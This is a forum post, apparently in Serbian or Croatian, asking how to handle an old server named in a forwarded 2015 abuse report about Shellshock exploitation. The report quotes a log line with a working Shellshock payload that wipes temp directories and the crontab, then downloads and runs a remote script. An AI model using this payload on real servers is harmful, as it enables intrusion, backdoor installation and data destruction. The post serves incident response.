Sta uradit na starom serveru ako dobijete ovakvo upozorenje?
From: chopper boy <[email protected]>
Date: 2015-04-29 9:55 GMT+02:00
Subject: Compromised server / Exploit attempts
To: "[email protected]
Compromised server / Exploit attempts
Exploit attempts via bash variable push. Downloads bash script which
installs backdoor Trojan.Hacktool.Linux.Bf.E and starts additional exploit
scans against other servers.
Compromised server:
5.135.167.145
xxx.xxx.xxx.xxx (IP -mog servera)
Exploit bash scripts:
http://xxx.xxx.xxx.xxx/i.gif
http://xxx.xxx.xxx.xxx/nynew54.gif
Exploit scans address lists:
http://198.27.67.24/news/<xxx>
http://198.27.67.24/download/<xxx>
5.135.167.145 - - [28/Apr/2015:14:45:57 -0700] "GET HTTP/1.1 HTTP/1.1" 400
304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
/tmp/* ; rm -rf /var/tmp/* ; crontab -r ; killall -9 wget curl lwp-download
b f r xx y i.gif print start pscan pnscan ps ; wget
http://xxx.xxx.xxx.xxx/i.gif ; curl -O http://xxx.xxx.xxx.xxx/i.gif ; chmod +x
i.gif ; nohup ./i.gif &
\");'"